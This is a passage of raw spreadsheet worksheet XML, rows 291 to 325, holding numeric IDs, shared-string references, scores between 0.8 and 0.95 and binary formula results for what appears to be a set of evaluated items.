      <c r="H291" s="64">
        <v>1.0</v>
      </c>
      <c r="I291" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J291" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K291" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L291" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M291" s="62" t="s">
        <v>1055</v>
      </c>
      <c r="N291" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O291" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="62">
        <v>16048.0</v>
      </c>
      <c r="B292" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C292" s="63" t="s">
        <v>1056</v>
      </c>
      <c r="D292" s="62" t="s">
        <v>1057</v>
      </c>
      <c r="E292" s="62" t="s">
        <v>1058</v>
      </c>
      <c r="F292" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G292" s="62">
        <v>0.9</v>
      </c>
      <c r="H292" s="64">
        <v>1.0</v>
      </c>
      <c r="I292" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J292" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K292" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L292" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O292" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="62">
        <v>16748.0</v>
      </c>
      <c r="B293" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C293" s="63" t="s">
        <v>1059</v>
      </c>
      <c r="D293" s="62" t="s">
        <v>1060</v>
      </c>
      <c r="E293" s="62" t="s">
        <v>1061</v>
      </c>
      <c r="F293" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G293" s="62">
        <v>0.9</v>
      </c>
      <c r="H293" s="64">
        <v>1.0</v>
      </c>
      <c r="I293" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J293" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K293" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L293" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O293" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="62">
        <v>20133.0</v>
      </c>
      <c r="B294" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C294" s="63" t="s">
        <v>1062</v>
      </c>
      <c r="D294" s="62" t="s">
        <v>1063</v>
      </c>
      <c r="E294" s="62" t="s">
        <v>1064</v>
      </c>
      <c r="F294" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G294" s="62">
        <v>0.95</v>
      </c>
      <c r="H294" s="64">
        <v>1.0</v>
      </c>
      <c r="I294" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J294" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K294" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L294" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O294" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="62">
        <v>20445.0</v>
      </c>
      <c r="B295" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C295" s="63" t="s">
        <v>1065</v>
      </c>
      <c r="D295" s="62" t="s">
        <v>1066</v>
      </c>
      <c r="E295" s="62" t="s">
        <v>1067</v>
      </c>
      <c r="F295" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G295" s="62">
        <v>0.95</v>
      </c>
      <c r="H295" s="64">
        <v>1.0</v>
      </c>
      <c r="I295" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J295" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K295" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L295" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O295" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="62">
        <v>20634.0</v>
      </c>
      <c r="B296" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C296" s="63" t="s">
        <v>1068</v>
      </c>
      <c r="D296" s="62" t="s">
        <v>1069</v>
      </c>
      <c r="E296" s="62" t="s">
        <v>1070</v>
      </c>
      <c r="F296" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G296" s="62">
        <v>0.9</v>
      </c>
      <c r="H296" s="64">
        <v>1.0</v>
      </c>
      <c r="I296" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J296" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K296" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L296" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O296" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="62">
        <v>21123.0</v>
      </c>
      <c r="B297" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C297" s="63" t="s">
        <v>1071</v>
      </c>
      <c r="D297" s="62" t="s">
        <v>1072</v>
      </c>
      <c r="E297" s="62" t="s">
        <v>1073</v>
      </c>
      <c r="F297" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G297" s="62">
        <v>0.9</v>
      </c>
      <c r="H297" s="64">
        <v>1.0</v>
      </c>
      <c r="I297" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J297" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K297" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L297" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O297" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="62">
        <v>22023.0</v>
      </c>
      <c r="B298" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C298" s="63" t="s">
        <v>1074</v>
      </c>
      <c r="D298" s="62" t="s">
        <v>1075</v>
      </c>
      <c r="E298" s="62" t="s">
        <v>1076</v>
      </c>
      <c r="F298" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G298" s="62">
        <v>0.95</v>
      </c>
      <c r="H298" s="64">
        <v>1.0</v>
      </c>
      <c r="I298" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J298" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K298" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L298" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O298" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="62">
        <v>22328.0</v>
      </c>
      <c r="B299" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C299" s="63" t="s">
        <v>1077</v>
      </c>
      <c r="D299" s="62" t="s">
        <v>1078</v>
      </c>
      <c r="E299" s="62" t="s">
        <v>1079</v>
      </c>
      <c r="F299" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G299" s="62">
        <v>0.9</v>
      </c>
      <c r="H299" s="64">
        <v>1.0</v>
      </c>
      <c r="I299" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J299" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K299" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L299" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O299" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="62">
        <v>22764.0</v>
      </c>
      <c r="B300" s="62" t="s">
        <v>37</v>
      </c>
      <c r="C300" s="63" t="s">
        <v>1080</v>
      </c>
      <c r="D300" s="62" t="s">
        <v>1081</v>
      </c>
      <c r="E300" s="62" t="s">
        <v>1082</v>
      </c>
      <c r="F300" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G300" s="62">
        <v>0.85</v>
      </c>
      <c r="H300" s="64">
        <v>0.0</v>
      </c>
      <c r="I300" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J300" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K300" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L300" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O300" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="62">
        <v>18.0</v>
      </c>
      <c r="B301" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C301" s="63" t="s">
        <v>1083</v>
      </c>
      <c r="D301" s="62" t="s">
        <v>1084</v>
      </c>
      <c r="E301" s="62" t="s">
        <v>1085</v>
      </c>
      <c r="F301" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G301" s="62">
        <v>0.9</v>
      </c>
      <c r="H301" s="64">
        <v>1.0</v>
      </c>
      <c r="I301" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J301" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K301" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L301" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O301" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="62">
        <v>22.0</v>
      </c>
      <c r="B302" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C302" s="63" t="s">
        <v>1086</v>
      </c>
      <c r="D302" s="62" t="s">
        <v>1087</v>
      </c>
      <c r="E302" s="62" t="s">
        <v>1088</v>
      </c>
      <c r="F302" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G302" s="62">
        <v>0.85</v>
      </c>
      <c r="H302" s="64">
        <v>0.0</v>
      </c>
      <c r="I302" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J302" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K302" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L302" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O302" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="62">
        <v>101.0</v>
      </c>
      <c r="B303" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C303" s="63" t="s">
        <v>1089</v>
      </c>
      <c r="D303" s="62" t="s">
        <v>1090</v>
      </c>
      <c r="E303" s="62" t="s">
        <v>1091</v>
      </c>
      <c r="F303" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G303" s="62">
        <v>0.85</v>
      </c>
      <c r="H303" s="64">
        <v>0.0</v>
      </c>
      <c r="I303" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J303" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K303" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L303" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O303" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="62">
        <v>127.0</v>
      </c>
      <c r="B304" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C304" s="63" t="s">
        <v>1092</v>
      </c>
      <c r="D304" s="62" t="s">
        <v>1093</v>
      </c>
      <c r="E304" s="62" t="s">
        <v>1094</v>
      </c>
      <c r="F304" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G304" s="62">
        <v>0.85</v>
      </c>
      <c r="H304" s="64">
        <v>0.0</v>
      </c>
      <c r="I304" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J304" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K304" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L304" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O304" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="62">
        <v>135.0</v>
      </c>
      <c r="B305" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C305" s="63" t="s">
        <v>1095</v>
      </c>
      <c r="D305" s="62" t="s">
        <v>1096</v>
      </c>
      <c r="E305" s="62" t="s">
        <v>1097</v>
      </c>
      <c r="F305" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G305" s="62">
        <v>0.85</v>
      </c>
      <c r="H305" s="64">
        <v>0.0</v>
      </c>
      <c r="I305" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J305" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K305" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L305" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O305" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="62">
        <v>146.0</v>
      </c>
      <c r="B306" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C306" s="63" t="s">
        <v>1098</v>
      </c>
      <c r="D306" s="62" t="s">
        <v>1099</v>
      </c>
      <c r="E306" s="62" t="s">
        <v>1100</v>
      </c>
      <c r="F306" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G306" s="62">
        <v>0.9</v>
      </c>
      <c r="H306" s="64">
        <v>0.0</v>
      </c>
      <c r="I306" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J306" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K306" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L306" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O306" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="62">
        <v>214.0</v>
      </c>
      <c r="B307" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C307" s="63" t="s">
        <v>1101</v>
      </c>
      <c r="D307" s="62" t="s">
        <v>1102</v>
      </c>
      <c r="E307" s="62" t="s">
        <v>1103</v>
      </c>
      <c r="F307" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G307" s="62">
        <v>0.85</v>
      </c>
      <c r="H307" s="64">
        <v>0.0</v>
      </c>
      <c r="I307" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J307" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K307" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L307" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O307" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="62">
        <v>752.0</v>
      </c>
      <c r="B308" s="62" t="s">
        <v>39</v>
      </c>
      <c r="C308" s="63" t="s">
        <v>1104</v>
      </c>
      <c r="D308" s="62" t="s">
        <v>1105</v>
      </c>
      <c r="E308" s="62" t="s">
        <v>1106</v>
      </c>
      <c r="F308" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G308" s="62">
        <v>0.85</v>
      </c>
      <c r="H308" s="64">
        <v>0.0</v>
      </c>
      <c r="I308" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J308" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K308" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L308" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O308" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="62">
        <v>31.0</v>
      </c>
      <c r="B309" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C309" s="63" t="s">
        <v>1107</v>
      </c>
      <c r="D309" s="62" t="s">
        <v>1108</v>
      </c>
      <c r="E309" s="62" t="s">
        <v>1109</v>
      </c>
      <c r="F309" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G309" s="62">
        <v>0.8</v>
      </c>
      <c r="H309" s="64">
        <v>0.0</v>
      </c>
      <c r="I309" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J309" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K309" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L309" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O309" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="62">
        <v>265.0</v>
      </c>
      <c r="B310" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C310" s="63" t="s">
        <v>1110</v>
      </c>
      <c r="D310" s="62" t="s">
        <v>1111</v>
      </c>
      <c r="E310" s="62" t="s">
        <v>1112</v>
      </c>
      <c r="F310" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G310" s="62">
        <v>0.9</v>
      </c>
      <c r="H310" s="64">
        <v>0.0</v>
      </c>
      <c r="I310" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J310" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K310" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L310" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O310" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="62">
        <v>443.0</v>
      </c>
      <c r="B311" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C311" s="63" t="s">
        <v>1113</v>
      </c>
      <c r="D311" s="62" t="s">
        <v>1114</v>
      </c>
      <c r="E311" s="62" t="s">
        <v>1115</v>
      </c>
      <c r="F311" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G311" s="62">
        <v>0.9</v>
      </c>
      <c r="H311" s="64">
        <v>1.0</v>
      </c>
      <c r="I311" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J311" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K311" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L311" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O311" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="62">
        <v>474.0</v>
      </c>
      <c r="B312" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C312" s="63" t="s">
        <v>1116</v>
      </c>
      <c r="D312" s="62" t="s">
        <v>1117</v>
      </c>
      <c r="E312" s="62" t="s">
        <v>1118</v>
      </c>
      <c r="F312" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G312" s="62">
        <v>0.9</v>
      </c>
      <c r="H312" s="64">
        <v>1.0</v>
      </c>
      <c r="I312" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J312" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K312" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L312" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O312" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="62">
        <v>477.0</v>
      </c>
      <c r="B313" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C313" s="63" t="s">
        <v>1119</v>
      </c>
      <c r="D313" s="62" t="s">
        <v>1120</v>
      </c>
      <c r="E313" s="62" t="s">
        <v>1121</v>
      </c>
      <c r="F313" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G313" s="62">
        <v>0.85</v>
      </c>
      <c r="H313" s="64">
        <v>0.0</v>
      </c>
      <c r="I313" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J313" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K313" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L313" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O313" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="62">
        <v>481.0</v>
      </c>
      <c r="B314" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C314" s="63" t="s">
        <v>1122</v>
      </c>
      <c r="D314" s="62" t="s">
        <v>1123</v>
      </c>
      <c r="E314" s="62" t="s">
        <v>1124</v>
      </c>
      <c r="F314" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G314" s="62">
        <v>0.9</v>
      </c>
      <c r="H314" s="64">
        <v>1.0</v>
      </c>
      <c r="I314" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J314" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K314" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L314" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O314" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="62">
        <v>495.0</v>
      </c>
      <c r="B315" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C315" s="63" t="s">
        <v>1125</v>
      </c>
      <c r="D315" s="62" t="s">
        <v>1126</v>
      </c>
      <c r="E315" s="62" t="s">
        <v>1127</v>
      </c>
      <c r="F315" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G315" s="62">
        <v>0.95</v>
      </c>
      <c r="H315" s="64">
        <v>1.0</v>
      </c>
      <c r="I315" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J315" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K315" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L315" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O315" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="62">
        <v>512.0</v>
      </c>
      <c r="B316" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C316" s="63" t="s">
        <v>1128</v>
      </c>
      <c r="D316" s="62" t="s">
        <v>1129</v>
      </c>
      <c r="E316" s="62" t="s">
        <v>1130</v>
      </c>
      <c r="F316" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G316" s="62">
        <v>0.8</v>
      </c>
      <c r="H316" s="64">
        <v>1.0</v>
      </c>
      <c r="I316" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J316" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K316" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L316" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O316" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="62">
        <v>525.0</v>
      </c>
      <c r="B317" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C317" s="63" t="s">
        <v>1131</v>
      </c>
      <c r="D317" s="62" t="s">
        <v>1132</v>
      </c>
      <c r="E317" s="62" t="s">
        <v>1133</v>
      </c>
      <c r="F317" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G317" s="62">
        <v>0.85</v>
      </c>
      <c r="H317" s="64">
        <v>1.0</v>
      </c>
      <c r="I317" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J317" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K317" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L317" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O317" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="62">
        <v>557.0</v>
      </c>
      <c r="B318" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C318" s="63" t="s">
        <v>1134</v>
      </c>
      <c r="D318" s="62" t="s">
        <v>1135</v>
      </c>
      <c r="E318" s="62" t="s">
        <v>1136</v>
      </c>
      <c r="F318" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G318" s="62">
        <v>0.9</v>
      </c>
      <c r="H318" s="64">
        <v>1.0</v>
      </c>
      <c r="I318" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J318" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K318" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L318" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O318" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="62">
        <v>637.0</v>
      </c>
      <c r="B319" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C319" s="63" t="s">
        <v>1137</v>
      </c>
      <c r="D319" s="62" t="s">
        <v>1138</v>
      </c>
      <c r="E319" s="62" t="s">
        <v>1139</v>
      </c>
      <c r="F319" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G319" s="62">
        <v>0.85</v>
      </c>
      <c r="H319" s="64">
        <v>1.0</v>
      </c>
      <c r="I319" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J319" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K319" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L319" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O319" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="62">
        <v>639.0</v>
      </c>
      <c r="B320" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C320" s="63" t="s">
        <v>1140</v>
      </c>
      <c r="D320" s="62" t="s">
        <v>1141</v>
      </c>
      <c r="E320" s="62" t="s">
        <v>1142</v>
      </c>
      <c r="F320" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G320" s="62">
        <v>0.85</v>
      </c>
      <c r="H320" s="64">
        <v>0.0</v>
      </c>
      <c r="I320" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J320" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K320" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L320" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O320" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="62">
        <v>652.0</v>
      </c>
      <c r="B321" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C321" s="63" t="s">
        <v>1143</v>
      </c>
      <c r="D321" s="62" t="s">
        <v>1144</v>
      </c>
      <c r="E321" s="62" t="s">
        <v>1145</v>
      </c>
      <c r="F321" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G321" s="62">
        <v>0.9</v>
      </c>
      <c r="H321" s="64">
        <v>1.0</v>
      </c>
      <c r="I321" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J321" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K321" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L321" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O321" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="62">
        <v>660.0</v>
      </c>
      <c r="B322" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C322" s="63" t="s">
        <v>1146</v>
      </c>
      <c r="D322" s="62" t="s">
        <v>1147</v>
      </c>
      <c r="E322" s="62" t="s">
        <v>1148</v>
      </c>
      <c r="F322" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G322" s="62">
        <v>0.85</v>
      </c>
      <c r="H322" s="64">
        <v>1.0</v>
      </c>
      <c r="I322" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J322" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K322" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L322" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O322" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="62">
        <v>738.0</v>
      </c>
      <c r="B323" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C323" s="63" t="s">
        <v>1149</v>
      </c>
      <c r="D323" s="62" t="s">
        <v>1150</v>
      </c>
      <c r="E323" s="62" t="s">
        <v>1151</v>
      </c>
      <c r="F323" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G323" s="62">
        <v>0.9</v>
      </c>
      <c r="H323" s="64">
        <v>1.0</v>
      </c>
      <c r="I323" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J323" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K323" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L323" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O323" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="62">
        <v>779.0</v>
      </c>
      <c r="B324" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C324" s="63" t="s">
        <v>1152</v>
      </c>
      <c r="D324" s="62" t="s">
        <v>1153</v>
      </c>
      <c r="E324" s="62" t="s">
        <v>1154</v>
      </c>
      <c r="F324" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G324" s="62">
        <v>0.9</v>
      </c>
      <c r="H324" s="64">
        <v>1.0</v>
      </c>
      <c r="I324" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J324" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K324" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L324" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O324" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="62">
        <v>809.0</v>
      </c>
      <c r="B325" s="62" t="s">
